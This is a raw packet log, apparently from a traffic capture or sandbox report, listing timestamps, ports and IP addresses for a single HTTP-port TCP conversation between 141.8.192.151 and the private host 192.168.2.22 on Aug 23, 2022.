Aug 23, 2022 13:42:52.768793106 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768826962 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768840075 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768853903 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768882036 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768898964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768912077 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768940926 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.768963099 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.768969059 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.769012928 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.769016027 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.772722960 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772758007 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772790909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772823095 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772849083 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772855043 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.772874117 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772880077 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.772902012 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772921085 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.772927046 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772952080 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772978067 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.772981882 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773001909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773019075 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773029089 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773052931 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773077965 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773082018 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773104906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773118019 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773132086 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773159981 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773181915 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773185968 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773212910 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773231030 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773238897 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773264885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773287058 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773293018 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773317099 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773334980 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773343086 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773369074 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773391008 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773395061 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773413897 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773422956 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773446083 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773466110 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.773472071 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773499012 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.773516893 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.827397108 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827435017 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827455997 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827610970 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.827788115 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827817917 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827846050 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827867985 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.827876091 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827902079 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827923059 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.827928066 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827955008 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827980042 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.827980042 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828007936 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828027964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828032970 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828080893 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828166008 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828191996 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828219891 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828237057 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828250885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828279972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828303099 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828306913 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828332901 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828353882 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828357935 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828382015 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828406096 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828407049 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828433990 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828450918 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828460932 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828489065 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828507900 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828512907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828541040 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828557968 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828567982 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828593969 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828619003 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828620911 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828651905 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828679085 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828681946 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828706980 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828723907 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828733921 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828759909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828777075 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828784943 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828813076 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828835964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828840971 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828870058 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828886032 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828896999 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828922987 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828949928 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.828960896 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828974962 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.828978062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829003096 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829025030 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829030037 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829057932 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829082966 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829085112 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829112053 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829129934 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829138994 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829164982 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829190969 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829193115 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829216957 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829240084 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829241991 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829267979 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829284906 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829293966 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829319954 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829339981 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829344988 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829370975 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829391003 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829396963 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829423904 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829448938 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829449892 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829478979 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829499960 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829507113 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829534054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829556942 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829561949 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829586983 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829605103 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829612970 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829641104 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829662085 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829668045 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829694986 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829713106 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829721928 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829751968 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829766035 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829777002 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829803944 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829823017 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829832077 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829859018 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829879045 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829886913 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829911947 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829937935 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829955101 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829963923 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.829981089 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.829991102 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830018044 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830041885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830044031 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830065966 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830085993 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830092907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830120087 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830146074 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830146074 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830174923 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830199003 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830205917 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830230951 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830248117 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830256939 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830282927 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830303907 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830308914 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830339909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830355883 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830368042 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830395937 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830416918 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830423117 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830446959 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830471039 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830473900 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830502033 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830521107 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830530882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830558062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830584049 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830590010 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830610037 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830616951 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830636024 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830662012 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830683947 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830689907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830718040 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830737114 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830741882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830766916 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830784082 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830790997 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830820084 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830836058 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830847025 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830873013 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830893040 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830899954 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830924034 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830950975 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.830951929 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830980062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.830996037 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831003904 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831031084 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831053972 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831077099 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831104994 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831125975 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831131935 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831160069 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831186056 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831192970 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831218958 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831243038 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831244946 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831270933 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831289053 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831299067 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831326962 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831367970 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831368923 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831399918 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831413984 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831425905 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831453085 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831478119 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831479073 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831506014 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831526041 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831535101 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831559896 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831578016 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831585884 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831610918 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831634998 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831638098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831662893 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831681013 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831686974 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831712961 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831732988 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831741095 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831767082 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831788063 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831793070 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831818104 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831839085 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831845999 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831872940 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831896067 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831899881 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831927061 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831948042 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.831953049 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.831979036 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832000971 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832003117 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832030058 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832058907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832084894 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832110882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832112074 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832138062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832150936 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832165003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832190990 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832206011 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832216024 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832241058 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832253933 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832266092 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832293034 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832315922 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.832320929 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.832366943 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833117008 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833143950 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833168983 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833195925 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833220005 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833240986 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833256006 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833295107 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833316088 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833328009 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833343983 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833348036 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833348989 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833357096 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833376884 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833401918 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833416939 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833427906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833453894 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833481073 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833481073 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833506107 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833519936 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833533049 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833561897 CEST	80	49172	141.8.192.151	192.168.2.22
